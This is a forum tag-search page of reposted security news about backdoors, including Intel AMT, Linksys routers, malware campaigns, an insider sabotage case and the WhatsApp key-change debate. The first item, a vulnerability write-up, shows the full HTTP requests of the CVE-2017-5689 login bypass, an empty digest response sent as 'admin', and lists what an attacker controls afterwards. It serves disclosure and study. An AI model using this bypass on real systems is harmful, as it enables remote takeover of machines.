Welcome to nsane.forums

Welcome to nsane.forums, like most online communities you need to register to view parts of our community or to make contributions, but don't worry: this is a free and simple process that requires minimal information. Be a part of nsane.forums by signing in or creating an account.

  • Access special members only forums
  • Start new topics and reply to others
  • Subscribe to topics and forums to get automatic updates

Search the Community

Showing results for tags 'backdoor'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Found 60 results

  1. An authentication bypass vulnerability, which will be later known as CVE-2017-5689, was originally discovered in mid-February of 2017 while doing side-research on the internals of Intel ME firmware. The first objects of interest were network services and protocols. While studying the Intel AMT Implementation and Reference Guide we found out that various AMT features are available through the AMT Web-panel, which is supported by the integrated Web server, which listens to ports 16992 and 16993. To protect the AMT from unauthorized access, the Web server provides several methods of authentication and authorization of a remote user. As stated in Authentication Options section of the «Intel AMT Implementation and Reference Guide»: «An admin account which is present by default and always uses digest authentication» seemed like an interesting thing to dig deeper into. Reverse-engineering the firmware Take a look at the example of the negotiation between AMT Web server and a remote client: GET /index.htm HTTP/1.1 Host: 192.168.1.2:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:16992/logon.htm Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm=»Digest:048A0000000000000000000000000000», nonce=»Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J»,stale=»false»,qop=»auth» Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 192.168.1.2:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:16992/logon.htm Connection: keep-alive Authorization: Digest username=»admin», realm=»Digest:048A0000000000000000000000000000», nonce=»Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J», uri=»/index.htm», response=»d3d4914a43454b159a3fa6f5a91d801d», qop=auth, nc=00000001, cnonce=»9c5beca4011eea5c» HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:03:49 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 With the right scripts at hand it didn’t take long to load the firmware into the disassembler and pinpoint the authentication code, via xrefs, to quite specific strings, such as «cnonce», «realm», and others. The figure shows a part of the function which is located @ 0x20431E74 in the NETSTACK module of Intel ME firmware version 9.0.30.1482, where the bug was originally discovered. This function is responsible for analyzing the «Authorization» header from the client’s HTTP request and validating the user provided response to the server challenge. Let’s move along the function’s code and note where the parsed values from the Authorization header are stored, which as we proceed: Finally, we will come to the where To-Be-Or-Not-To-Be decision takes place, and it looks like this: The part where the call to strncmp() occurs seems most interesting here: if(strncmp(computed_response, user_response, response_length)) exit(0x99); The value of the computed response, which is the first argument, is being tested against the one that is provided by user, which is the second argument, while the third argument is the length of the response. It seems quite obvious that the third argument of strncmp() should be the length of computed_response , but the address of the stack variable response_length , from where the length is to be loaded, actually points to the length of the user_response ! Given an empty string the strncmp() evaluates to zero thus accepting and invalid response as a valid one. No doubt it’s just a programmer’s mistake, but here it is: keep silence when challenged and you’re in. Exploitation example With a little help of the local proxy at 127.0.0.1:16992 , which is meant to replace the response with an empty string, we’re able to manage the AMT via the regular Web browser as if we’ve known the admin password: GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm=»Digest:048A0000000000000000000000000000», nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n»,stale=»false»,qop=»auth» Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username=»admin», realm=»Digest:048A0000000000000000000000000000», nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n», uri=»/index.htm», response=»», qop=auth, nc=00000001, cnonce=»60513ab58858482c» 5 HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 Possible attack scenarios Now let us talk about what a possible attacker could do after gaining an access to the AMT services. First of all, you should remember that Intel AMT provides the ability to remotely control the computer system even if it’s powered off (but connected to the electricity mains and network). Also, Intel AMT is completely independent of OS installed on the computer system. In fact, this technology allows to remotely delete or reinstall it. So, there are several possible attack scenarios that could be conducted using the mentioned vulnerability. These are based on the following Intel AMT features: • KVM (remote control of mouse keyboard and monitor), you can use this capability to remotely perform any common physical actions (with mouse, keyboard) you do locally and usually when you working with your PC. Which means, you can remotely load, execute any program to the target system, read/write any file (using the common file explorer) etc. • IDE-R (IDE Redirection), you can remotely change the boot device to some other virtual image for example (so the system won’t boot your usual Operating System from your hard drive, but will boot the image(virtual disk) from the source specified remotely) • SOL (Serial over LAN), you can remotely power on/power off/reboot/reset and do other actions with this feature. Also, it can be used to access BIOS setup for editing.
  2. A malware coder is injecting megabytes of junk data inside his malicious payloads, hoping to avoid detection by some antivirus solutions or delay investigations of infosec professionals. Known only as "123", this malware coder has been active since 2015, when he was first spotted deploying the XXMM malware. His activity falls in the category of targeted attacks, this crook focusing on infecting computers at Japanese companies for the purpose of exfiltrating sensitive data. 123 malware author behind three malware families According to reports, this threat actor is behind at least three malware families, named XXMM, ShadowWali, and Wali, respectively. Security firms noted 123's initial attacks with the XXMM malware in 2015, but they deemed it an usophisticated, albeit very effective, backdoor. The interest in 123's activities piqued again over the past month after they unearthed two new malware families created by the same coder. The first one they've discovered was a new backdoor trojan called Wali, which they saw used in live attacks in 2016 and 2017. Two weeks after Kaspersky's initial Wali report, security researchers from Cybereason unearthed another backdoor, which they named ShadowWali due to the many features it shared with Wali. ShadowWali is very likely an earlier version of Wali Researchers uncovered attacks against Japanese companies with ShadowWali between 2015 and mid-2016, just before the Wali attacks. Even if there are many differences between the two, experts believe ShadowWali was an earlier version of Wali, a theory supported by the fact that ShadowWali only supported 32-bit architectures, while Wali runs on both 32-bit and 64-bit systems, a clear evolution from the first. Furthermore, their modus operandi is almost the same. An attack starts after a user downloads the malware from a compromised website. Running the initial payload will start a series of checks, which if satisfied, will end up downloading the final ShadowWali / Wali backdoor. ShadowWali and Wali are inflated with junk data Both ShadowWali and Wali are packed inside huge files, ranging from 50 to 200 MBs. Most of the data packed around ShadowWali and Wali is junk data with no real purpose. This is strange, as most malware is usually very small, only a few KBs, and very rarely reaching MB levels. According to security experts, they believe 123 is under the false impression that by packing malware in large files, security products won't scan the files, thinking they're legitimate apps, or due to performance reasons. Researchers also put forward the theory that another reason why 123 is packing loads of junk data around ShadowWali and Wali payloads is that he is trying to delay investigations from security firms. The reason is that YARA rules, special filters used by infosec professionals to track down malware, are often configured to look at small files, rather than larger files. ShadowWali/Wali used to download password dumper On infected computers, once ShadowWali or Wali are installed, the malware injects itself into other processes. In most infections, the process of choice has been Internet Explorer (iexplorer.exe), but there have been cases where the malware was injected into Windows Explorer (explorer.exe) and the Local Security Authority Subsystem Service (lsass.exe). After this, the next step is to download several tools to dump credentials from the current PC and explore the local network. To fetch local user credentials, ShadowWali/Wali downloads and installs a module of Mimkatz, a password-dumping utility. 123 then uses these credentials to move laterally inside a company's network, searching for sensitive information he could steal. What 123 does with this data is currently unknown. Researcher uncover ShadowWali builder Further sleuthing from Cybereason experts uncovered a utility that appears to be the ShadowWali builder, an application used to assemble the malware. xxmm2_builder interface xxmm2_builder - first button options xxmm2_builder - second button options xxmm2_builder - third button options Even if it's named "xxmm2_build," Cybereason's Assaf Dahan says the output of this builder is more consistent with ShadowWali samples, rather than XXMM backdoors. Further, the usage of the term "rootkit" in the builder's interface isn't consistent with the output, as samples operated in user-mode only. The builder also allowed researchers insight into the malware's C&C server comms, which rely on steganography to hide second-stage malware downloads inside JPG images, and a PHP tunnel to exchange data with infected hosts. According to experts, there is also evidence that points to 123 being located in Asia, but no exact and definitive attribute could be made at this point. Source
  3. Linksys says that 25 router models are vulnerable to remote hacking and could be taken over by an attacker if users still use their default admin credentials. The company issued a security advisory this week, letting customers know that certain products are vulnerable to three vulnerabilities discovered by cyber-security firm IOActive. Linksys, formerly part of Cisco, now a Belkin brand, says it's working on delivering a firmware update to mitigate all three flaws. In the meantime, the company issued a security alert as a warning for customers that might be vulnerable to attacks. Linksys routers affected by three major issues IOActive, who published a report on their blog, restrained from publishing any technical details about how an attacker could exploit the three issues, but only vaguely described them. The issues are as follow. (1) An attacker can send malformed requests to the router that causes a denial-of-service state which freezes or reboots the router until the attacker stops his malformed requests. (2) An attacker can bypass authentication procedures and collect information on the router and its users, such as firmware version, Linux kernel version, a list of running processes, a list of connected USB devices, the WPS PIN for the Wi-Fi connection, firewall configurations, FTP settings, and SMB server settings. (3) An attacker can execute code on the router. One of the uses for this flaw is that it allows an attacker to create a secret root-level backdoor account that does not appear in the router's web-based configuration panel. Linksys urges customers to change default passwords By far the most dangerous flaw is the last. Fortunately, this flaw can only be exploited by an authenticated user, meaning the attacker must first gain access to one of the Linksys configuration accounts. This is why Linksys is warning customers who are still using default credentials. Such routers are vulnerable and are now sitting ducks until the company releases a firmware update in the coming days or weeks. Besides changing default passwords, Linksys security engineers are also recommending that users disable the Wi-Fi guest network and urge users to turn on the router's built-in automatic updates setting, so the router fetches and installs the new firmware whenever it becomes available. Over 7,000 Linksys routers exposed online IOActive researchers said that an Internet-wide scan for vulnerable Linksys routers discovered 7,000 devices exposed to the Internet, with over 700 routers still using the default password. "It should be noted that this number does not take into account vulnerable devices protected by strict firewall rules or running behind another network appliance, which could still be compromised by attackers who have access to the individual or company’s internal network," IOActive added. Below is the list of vulnerable Linksys router models: Source
  4. A former sysadmin is facing up to ten years in prison and a fine of up to $250,000 after he used a backdoor account and sabotaged his former employer on the day he was fired. The incident in question took place on September 1, 2016, the day Joe Vito Venzor, 41, was let go from his job as IT engineer at the help desk of Lucchese Bootmaker, a boot-making company headquartered in El Paso, Texas. Court documents say Venzor was "volatile" and it took company employees around an hour to get him out of the building after bosses notified him of his firing around 10:30 AM. Venzor uses backdoor account to enact revenge At 11:30 AM, authorities say that Venzor used a hidden account he created with the name of "elplaser" and shut down the company's email and application servers. The latter was responsible for managing the company's customer orders system, along with other critical systems in Lucchese's production line, warehouse, and distribution center. As a result of shutting down this server, activity stopped inside Lucchese's factory, and after three hours during which time the company's IT staff couldn't get systems back up and running, management was forced to send 300 employees home. Venzor also changed passwords for staff accounts IT staffers said they couldn't restore the email and application servers because the intruder also deleted core system files critical to both applications, and blocked existing staff accounts by changing their passwords. Lucchese told authorities they had to hire an outside contractor to help fix the damage, and it took them weeks to catch up with lost orders and production. Venzor's entire hacking escapade lasted for around 45 minutes, but he failed miserably when it came to hiding his tracks. Venzor did poor job at hiding his tracks Suspecting Venzor was behind the attack, which occurred on the day he was fired, company and law enforcement took a look at the former employee's account history. Here they found that Venzor had collected the usernames and passwords of his colleagues and stored this information in a file. He later sent this file using his work email to his personal email. The order in which these employee accounts were saved in the file is the same order in which the intruder had changed passwords. Furthermore, the "elplaser" backdoor account, which was made to look like an office laser printer, had been used before the attack. Logs showed the account was used from Venzor's password-protected work computer. Police arrested Venzor on October 7, 2016. The suspect was later released on a $10,000 bond and has pleaded guilty yesterday, on March 30, 2017. His sentencing hearing is scheduled for June 6, 2017. Source
  5. The US Department of Justice announced yesterday that Maxim Senakh, 41, of Velikii Novgorod, Russia, pleaded guilty for his role in the creation of the Ebury malware and for maintaining its infamous botnet. US authorities indicted Senakh in January 2015, and the law enforcement detained the hacker in Finland in August of the same year. Finland approved Senakh's extradition to the US in January 2016, but not without the classic rhetoric from Russian authorities who called the extradition process "legal abuse," and the practice of arresting Russian citizens abroad an "illegal practice" and "witch hunt." After facing legal proceedings in the US, Senakh has now confessed to his role in the creation of the Ebury malware together with other unnamed co-conspirators. Ebury malware infected around 25,000 servers The Ebury malware appeared on the malware scene in 2011, and only targeted UNIX-like operating systems like Linux, FreeBSD, and Solaris. Crooks installed Ebury on servers left unprotected online. The malware contained a rootkit component to survive between reboots and a backdoor to provide criminals remote access. Hackers also used Ebury to steal SSH login credentials and SSH private keys, which they later used to infect new servers. Ebury timeline (via ESET) Crooks assembled servers infected with Ebury in a botnet they used to redirect traffic to paying customers or to send email spam, also for financial gain. During its peak, ESET estimated that Ebury infected 25,000 servers across the world. Ebury's became famous in 2011 after a Florida man, with no connections to the Ebury crew, installed Ebury on kernel.org servers. In recent years, Ebury activity has died down following aggressive sinkholing, albeit the malware will still pop up in a honeypot once in a while. Ebury was often used together with other malware such as CDorked, Onimiki, and Calfbot. Coverage of Ebury attacks and features can be found on the sites of Steinar H. Gunderson, ESET [1, 2], CERT-BUND, and Sucuri. Senakh's sentencing is scheduled for August 3, 2017. Source
  6. Developers sharing code on GitHub are being targeted in a malicious email campaign that's infecting their computers with a modular trojan known as Dimnie. GitHub users first started noticing and complaining about these attacks at the end of January this year, but cyber-security firm Palo Alto, who's been investigating the incidents, says attacks started a few weeks prior. GitHub users spear-phished by unknown group Even if the malware payload (Dimnie) is somewhat rare, the attack itself is mundane and follows a classic modus operandi. Unknown individuals start by sending selected GitHub users a recruitment email. Below are just two of the many messages used in this campaign. Hey. I found your software is online. Can you write the code for my project? Terms of reference attached below. The price shall discuss, if you can make. Answer please. Hello, My name is Adam Buchbinder, I saw your GitHub repo and i'm pretty amazed. The point is that i have an open position in my company and looks like you are a good fit. Please take a look into attachment to find details about company and job. Dont hesitate to contact me directly via email highlighted in the document below. Thanks and regards, Adam. The lure is always the same, a new job, which the user can study in detail if he downloads a file attachment. According to Palo Alto Networks, this email attachment is an archive, which unzips to a macro-laced Word document. The macro, if allowed to execute, will execute a series of PowerShell commands which download and install the Dimnie trojan. Macro scripts drop new version of Dimnie trojan The payload surprised Palo Alto experts because they discovered a new version of the Dimnie trojan, a malware downloader that has remained relatively the same since it first appeared three years ago, in 2014. Analyzing this new version, researchers found a much more potent threat than older Dimnie versions. This new iteration came with the ability to disguise malicious traffic under fake domains and DNS requests, but also with a plethora of new modules, all of which it executed in the OS memory, without leaving a footprint on the user's disks. This fileless behavior is what helped attackers keep a low profile. Additionally, the new modules were also very potent, granting attackers various abilities. For example, Dimnie operators could inject their malicious module into the process of any other application, collect various types of information from infected hosts, log keystrokes on 32-bit and 64-bit architectures, take screenshots of the user's desktop, quietly exfiltrate stolen data to the attacker's C&C server, and self-destruct when ordered to. Because of its stealthy (in memory) mode of execution and ability to disguise communications behind regular traffic, researchers aren't sure when this new version was developed and deployed in attacks for the first time. As time goes by, we might learn of other attacks that could be attributed to this malware family and its operators. Attackers were most likely looking for a way to hack enterprises As for its current campaign, there are multiple and obvious reasons why GitHub users were targeted. For starters, the vast majority oof GitHub users are developers and are likely employed in a similar position. Gaining access to the computers of these individuals gives attackers a way to access the internal networks of various organizations. These computers could be used to launch reconnaissance attacks and study enterprise networks before launching other attacks. Furthermore, some of these users also have access to private GitHub repositories, which are often set up by organizations to manage the source code of their own applications. Gaining access to these private repositories means gaining access to proprietary code and intellectual property, which an attacker could use to blackmail a company or sell it to its competitors. Source
  7. UK Home Secretary Amber Rudd on Sunday called for greater government access to encrypted content on mobile apps. Apps with end-to-end encryption, like Facebook's WhatsApp, should not be allowed to conceal terrorists' communications from law enforcement, Rudd said in an appearance on The Andrew Marr Show, a BBC broadcast. "There should be no place for terrorists to hide," she said. "We need to make sure that organizations like WhatsApp -- and there are plenty of others like that -- don't provide a secret place for terrorists to communicate with each other." Khalid Masood, who killed four people outside the UK's parliament building last week before being shot dead, reportedly used WhatsApp a few minutes before going on his murder spree. "On this situation, we need to make sure that our intelligence services have the ability to get into situations like encrypted WhatsApp," Rudd maintained. Backdoor Law in Place? Even though she supported end-to-end encryption as a cybersecurity measure, Rudd later said in an interview on Sky News, it was "absurd" to have terrorists talking on a formal platform and not have access to those conversations. "We are horrified at the attack carried out in London and are cooperating with law enforcement as they continue their investigations," WhatsApp spokesperson Anne Yeh said in a statement provided to TechNewsWorld. During her appearance on Marr's show, Rudd disclosed that she would be meeting with Facebook and other technology companies on Thursday to discuss ways to meet the information needs of security officers. She did not rule out new legislation to regulate encrypted messaging if the government and the tech companies were unable to reach an accord. However, that law may already exist. The UK last year adopted the Investigatory Powers Act, which compels tech companies to "provide a technical capability" to remove "electronic protection" within their products. That law has been interpreted in some quarters to mean that tech companies can be compelled to install "backdoors" into their products in order to decrypt data when necessary. A backdoor would not have helped prevent Masood's attack, however. "To use a backdoor, you have to identify somebody as a target and hack them," explained Matthew Green, a computer science professor specializing in cryptography at Johns Hopkins University. "With this terrorist, they identified this person and decided he wasn't a threat and stopped monitoring him," he told TechNewsWorld. "Nothing is going to help once you look at a guy then look away." No Door Secure Enough Backdoors have been criticized as a means to meet the information needs of law enforcement because they undermine the purpose of encryption. "Many technologists and even many in law enforcement have acknowledged there's no secure backdoor," said Chris Calabrese, vice president for policy at the Center for Democracy & Technology. "You simply cannot build a door that only the good guys can walk through," he told TechNewsWorld. "If you start building backdoors, they will be exploited by hackers; they will be exploited by terrorists." Tech companies have been skeptical of creating backdoors to break the encryption used by their products and then turning over the keys to law enforcement. Another idea floated is that the companies should create the backdoors but retain control of the keys to prevent abuse. "That won't work. The systems are too complicated and the backdoors too difficult to keep secure," Calabrese said. "Companies don't want to have to worry about their employees misusing these keys, and they don't want to have to secure them," said Johns Hopkins' Green. Application Hopping Even if backdoors were installed in applications like WhatsApp, they most likely would miss their mark -- assuming that mark is to prevent terrorists from communicating securely. "If the bad guys feel that this application has been compromised by government officials and backdoors become available, this leads to a simple response by the bad guys -- use a different application," explained Paul Calatayud, CTO at FireMon. "WhatsApp is a third-party application on a mobile device," he told TechNewsWorld. "Nothing prevents the bad guys from moving to a lesser known third-party application." While WhatsApp can't crack the encrypted contents on the parliament killer's phone, it still can provide authorities with information about the terrorist's phone activity -- such as the time a message was sent, who it was sent to, and the physical location of the sender and recipient. "It doesn't matter what this guy said before he did this thing," said Bruce Schneier, CTO of IBM Resilient. "What matters is who it was, and WhatsApp doesn't protect that." Investigators can access all kinds of information without recourse to backdoors, he told TechNewsWorld, "but that would require a real conversation about the problem, which you don't get from these people who grandstand after tragedies." Source
  8. A theoretical scenario that leverages the SHA1 collision attack disclosed recently by Google can serve backdoored BitTorrent files that execute code on the victim's machine, deliver malware, or alert copyright owners when their software has been pirated. The theoretical attack, nicknamed BitErrant, is the work of Tamas Jos, a Hungarian security expert working for SWIFT, the company behind the SWIFT protocol used for international inter-banking transactions. To understand the attack, users first need to understand how BitTorrent works. When someone creates a torrent file, they actually break up the original file into smaller chunks and save information about these chunks inside the torrent file. This data includes the SHA1 hash of each chunk, which is used as a signature to detect the validity of the chunks when other users download these small file parts. If the SHA1 hash for the downloaded chunk doesn't match the SHA1 hash included in the torrent file, the downloaded data is discarded. On top of these, the torrent files themselves have a SHA1 hash, which BitTorrent clients use when loading the .torrent file to start the download/seeding process. Jos says that an attacker can create torrent files that have the same overall SHA1 hash, but download different versions of an EXE file, without breaking the SHA1 hashes of the smaller chunks. The researcher has achieved this by using the two PDF files Google published two weeks ago when it revealed its SHA1 collision attack, nicknamed SHAttered. These PDF files have different content, but the same SHA1 hash signature. The trick is to embed these two PDF files inside the good and the bad version of the EXE file, and align them inside torrent file so they fall in the same data chunk. This allows the attacker to switch the the good EXE file with the bad EXE file anytime he wants, without breaking the torrent file's SHA1 hash. Jos published on Github a toolkit for generating different Windows executables that when converted into torrent files have identical SHA1 hashes. Two proof-of-concept torrent files with the same SHA1 are available for download here. "An attacker can create an executable file which when executed looks harmless, but will change its execution path based on what data is inside the SHATTER region," Jos explains. A BitErrant attack starts by seeding a good version of the EXE file, and later replacing it with an evil version. Because SHA1 hashes never change, BitTorrent clients won't break the seeding process, and some users will download the evil version of EXE file. This allows an attacker to include and trigger the execution of malicious shellcode when the victim executes the evil EXE file. For example (picture below), in the good version of the EXE file, the attacker includes encrypted shellcode. When the user executes the good EXE file, because it can't decrypt the shellcode, the shellcode won't run. After the attacker switches the good EXE for the evil EXE, he'll include the decryption key inside the evil EXE. When users run the evil EXE file, the binary decrypts the shellcode with the decryption key and performs a malicious action. This can be the installation of computer viruses, banking trojans, backdoors, or other actions the attacker wishes to take. BitErrant can be used for hunting down software pirates "I have gotten feedback from security experts that this attack can be used for 'aggressive' intellectual property protection," Jos told Bleeping Computer in an email. "Example: Big company makes a cool game, and backdoors its own ISO/MSI/... file. If the ISO file appears on file sharing networks, they can immediately start seeding the bad chunk, that would trigger a functionality which renders the game unusable." Additionally, functionality can be included that pings the game maker's servers, identifying users that pirated the game. BitErrant attack depends on careless users From a security standpoint, users still need to execute the downloaded file, and malware scanners may still pick up the malicious EXE file. BitErrant attacks will only work if users are convinced they downloaded the file from a trusted location, or they have previously downloaded the same file and it was clean the first time they checked it. The purpose of the BitErrant attack is to show how Google's SHA1 collision attack could be used in a real world scenario. Speaking to Bleeping Computer, Jos said he only perfected the attack at a theoretical level and has generated test EXE files that trigger an SHA1 collision. "I have not tested it out on the network," he said. "However I have tested it out by importing the files using the official BitTorrent client and Transmission-Qt client, and both clients verified both files' "integrity" and started seeding them. This seemed to be enough reason to deem the attack working." The researcher told Bleeping Computer he plans to record a live network test demo in the coming days. No BitErrant attacks detected in the wild Jos says there's no immediate threat to users, as no attack has been observed in the wild. Nevertheless, the attack's potential outcome raises many security concerns. "I'd really hate to see this happening, to be honest, [...] as this PoC could easily be 'mitigated'," Jos said. The researcher's advice when dealing with torrent downloads is that users should always check the SHA256 (SHA2) hash of the file they just downloaded with the SHA256 hash of the original file. Unfortunately, not many torrent portals publish the SHA256 hash of the original file. Bleeping Computer has reached out for comment from BitTorrent Inc., the company behind many of today's BitTorrent clients, and Bram Cohen, author of the BitTorrent protocol. We have not received a reply before the article's publication. The article may receive updates if the two parties wish to issue any statements on the BitErrant attack. Besides BitTorrent, Apache Subversion was also affected by SHA1 collision attacks. Article source
  9. Explained — What's Up With the WhatsApp 'Backdoor' Story? Feature or Bug! What is a backdoor? By definition: "Backdoor is a feature or defect of a computer system that allows surreptitious unauthorized access to data, " either the backdoor is in encryption algorithm, a server or in an implementation, and doesn't matter whether it has previously been used or not. Yesterday, we published a story based on findings reported by security researcher Tobias Boelter that suggests WhatsApp has a backdoor that "could allow" an attacker, and of course the company itself, to intercept your encrypted communication. The story involving the world's largest secure messaging platform that has over a billion users worldwide went viral in few hours, attracting reactions from security experts, WhatsApp team, and Open Whisper Systems, who partnered with Facebook to implement end-to-end encryption in WhatsApp. Note: I would request readers to read complete article before reaching out for a conclusion. And also, suggestions and opinions are always invited What's the Issue: The vulnerability relies on the way WhatsApp behaves when an end user's encryption key changes. WhatsApp, by default, trusts new encryption key broadcasted by a contact and uses it to re-encrypt undelivered messages and send them without informing the sender of the change. In my previous article, I have elaborated this vulnerability with an easy example, so you can head on to read that article for better understanding. Facebook itself admitted to this WhatsApp issue reported by Boelter, saying that "we were previously aware of the issue and might change it in the future, but for now it's not something we're actively working on changing." What Experts argued: According to some security experts — "It's not a backdoor, rather it’s a feature to avoid unnecessarily re-verification of encryption keys upon automatic regeneration." Open Whisper Systems says — "There is no WhatsApp backdoor," "it is how cryptography works," and the MITM attack "is endemic to public key cryptography, not just WhatsApp." A spokesperson from WhatsApp, acquired by Facebook in 2014 for $16 Billion, says — "The Guardian's story on an alleged backdoor in WhatsApp is false. WhatsApp does not give governments a backdoor into its systems. WhatsApp would fight any government request to create a backdoor." What's the fact: Notably, none of the security experts or the company has denied the fact that, if required, WhatsApp, on government request, or state-sponsored hackers can intercept your chats. What all they have to say is — WhatsApp is designed to be simple, and users should not lose access to messages sent to them when their encryption key is changed. Open Whisper Systems (OWS) criticized the Guardian reporting in a blog post saying, "Even though we are the creators of the encryption protocol supposedly "backdoored" by WhatsApp, we were not asked for comment." What? "...encryption protocol supposedly "backdoored" by WhatsApp…" NO! No one has said it's an "encryption backdoor;" instead this backdoor resides in the way how end-to-end encryption has been implemented by WhatsApp, which eventually allows interception of messages without breaking the encryption. As I mentioned in my previous story, this backdoor has nothing to do with the security of Signal encryption protocol created by Open Whisper Systems. It's one of the most secure encryption protocols if implemented correctly. Then Why Signal is more Secure than WhatsApp? You might be wondering why Signal private messenger is more secure than Whatsapp, while both use the same end-to-end encryption protocol, and even recommended by the same group of security experts who are arguing — "WhatsApp has no backdoor." It's because there is always room for improvement. The signal messaging app, by default, allows a sender to verify a new key before using it. Whereas, WhatsApp, by default, automatically trusts the new key of the recipient with no notification to the sender. And even if the sender has turned on the security notifications, the app notifies the sender of the change only after the message is delivered. So, here WhatsApp chose usability over security and privacy. It’s not about 'Do We Trust WhatsApp/Facebook?': WhatsApp says it does not give governments a "backdoor" into its systems. No doubt, the company would definitely fight the government if it receives any such court orders and currently, is doing its best to protect the privacy of its one-billion-plus users. But what about state-sponsored hackers? Because, technically, there is no such 'reserved' backdoor that only the company can access. Why 'Verifying Keys' Feature Can't Protect You? WhatsApp also offers a third security layer using which you can verify the keys of other users with whom you are communicating, either by scanning a QR code or by comparing a 60-digit number. But here’s the catch: This feature ensure that no one is intercepting your messages or calls at the time you are verifying the keys, but it does not ensure that no one, in the past had intercepted or in future will intercept your encrypted communication, and there is no way, currently, that would help you identify this. WhatsApp Prevention against such MITM Attacks are Incomplete WhatsApp is already offering a "security notifications" feature that notifies users whenever a contact's security code changes, which you need to turn on manually from app settings. But this feature is not enough to protect your communication without the use of another ultimate tool, which is — Common Sense. Have you received a notification indicating that your contact's security code has changed? Instead of offering 'Security by Design,' WhatsApp wants its users to use their common sense not to communicate with the contact whose security key has been changed recently, without verifying the key manually. The fact that WhatsApp automatically changes your security key so frequently (for some reasons) that one would start ignoring such notifications, making it practically impossible for users to actively looking each time for verifying the authenticity of session keys. What WhatsApp should do? Without panicking all one-billion-plus users, WhatsApp can, at least: Stop regenerating users' encryption keys so frequently (I clearly don't know why the company does so). Give an option in the settings for privacy-conscious people, which if turned on, would not automatically trust new encryption key and send messages until manually accepted or verified by users. ...because just like others, I also hate using two apps for communicating with my friends and work colleagues i.e. Signal for privacy and WhatsApp because everyone uses it. Source
  10. WhatsApp Security: Make This Change Right Now! Security researchers found a backdoor in the popular messaging application WhatsApp recently that could allow WhatsApp to intercept and read user messages. Facebook, the owner of WhatsApp, claims that it is impossible to intercept messages on WhatsApp thanks to the services end-to-end encryption. The company states that no one, not even itself, can read what is sent when both sender and recipient use the latest version of the application. It turns out however that there is a way for WhatsApp to read user messages, as security researcher Tobias Boelter (via The Guardian) found out. Update: In a statement sent to Ghacks, a WhatsApp spokesperson provided the following insight on the claim: WhatsApp has the power to generate new encryption keys for users who are not online. Both the sender and the recipient of messages are not made aware of that, and the sender would send any message not yet delivered again by using the new encryption key to protect the messages from third-party access. The recipient of the message is not made aware of that. The sender, only if Whatsapp is configured to display security notifications. This option is however not enabled by default. While WhatsApp users cannot block the company -- or any state actors requesting data -- from taking advantage of the loophole, they can at least activate security notifications in the application. The security researcher reported the vulnerability to Facebook in April 2016 according to The Guardian. Facebook's response was that it was "intended behavior" according to the newspaper. Activate security notifications in WhatsApp To enable security notifications in WhatsApp, do the following: Open WhatsApp on the device you are using. Tap on menu, and select Settings. Select Account on the Settings page. Select Security on the page that opens. Enable "show security notifications" on the Security page. You will receive notifications when a contact's security code has changed. While this won't prevent misuse of the backdoor, it will at least inform you about its potential use. Source Alternate Source - 1: WhatsApp Encryption Has Backdoor, Facebook Says It's "Expected Behaviour" Alternate Source - 2: WhatsApp Backdoor allows Hackers to Intercept and Read Your Encrypted Messages Alternate Source - 3: Oh, for F...acebook: Critics bash WhatsApp encryption 'backdoor' Alternate Source - 4: Your encrypted WhatsApp messages can be read by anyone Alternate Source - 5: How to protect yourself from the WhatsApp 'backdoor' Alternate Source - 6: 'Backdoor' in WhatsApp's end-to-end encryption leaves messages open to interception [Updated] Detailed Explanation of the Issue and Prevention/Alternatives:
